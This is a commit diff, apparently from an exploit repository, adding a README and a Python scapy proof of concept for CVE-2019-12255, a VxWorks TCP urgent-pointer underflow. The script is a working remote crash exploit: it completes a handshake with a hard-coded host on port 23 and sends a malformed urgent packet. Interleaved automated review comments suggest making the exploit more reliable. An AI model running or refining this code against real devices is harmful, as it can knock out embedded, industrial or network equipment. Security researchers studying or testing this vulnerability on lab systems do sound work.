xzz authored and xzz committed Aug 11, 2019
1 parent 5e9c273 commit 9c6e603
Showing 4 changed files with 30 additions and 0 deletions.
11 changes: 11 additions & 0 deletions CVE-2019-12255/README.md
@@ -0,0 +1,11 @@
## CVE-2019-12255
VxWorks TCP Urgent pointer = 0 integer underflow

## Discovered By
Armis Security

## Vulnerability Summary
The vulnerability exists in the IPnet stack of VxWorks. The details of the vulnerability can be found [here](https://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS-wp.pdf). The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
![ftp crash](crash_ftp.png)

![telnet crash](crash_telnet.png)
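
Review bot: The Vulnerability Summary gives no affected or tested VxWorks version and no pointer to a fixed release, so a reader cannot tell from the line "The PoC can crash VxWorks tasks" whether their device is in scope; add the version the two screenshots were taken on and a reference to the vendor fix. The link text "here" should name the document it points to (the Black Hat USA-19 white paper, per the URL), and "tasks(set the port corresponding to the task in the PoC)" needs a space before the parenthesis and reads better as its own sentence.
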
Binary file added CVE-2019-12255/crash_ftp.png
Binary file added CVE-2019-12255/crash_telnet.png
19 changes: 19 additions & 0 deletions CVE-2019-12255/poc.py
@@ -0,0 +1,19 @@
from scapy.all import *

if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)

syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)

seq_num = seq_num + 1
ack_num = syn_ack.seq+1
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
send(ack)

psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
send(psh)
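
Review bot: `syn_ack = sr1(syn)` is called without a timeout and its result is never checked, so the script blocks indefinitely when the target does not answer, and any reply that is not a SYN-ACK is still fed into `ack_num = syn_ack.seq+1`; pass a timeout, and exit with a clear message unless the reply is non-None and carries a TCP layer with SYN and ACK set. `random.randint(1024,65535)` depends on the wildcard `from scapy.all import *` to bring `random` into scope; add an explicit `import random`. The target `ip = "192.168.10.199"` and `dport = 23` are hard-coded, which makes it easy to run the script against a host other than the intended lab device; take both as required command-line arguments instead.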
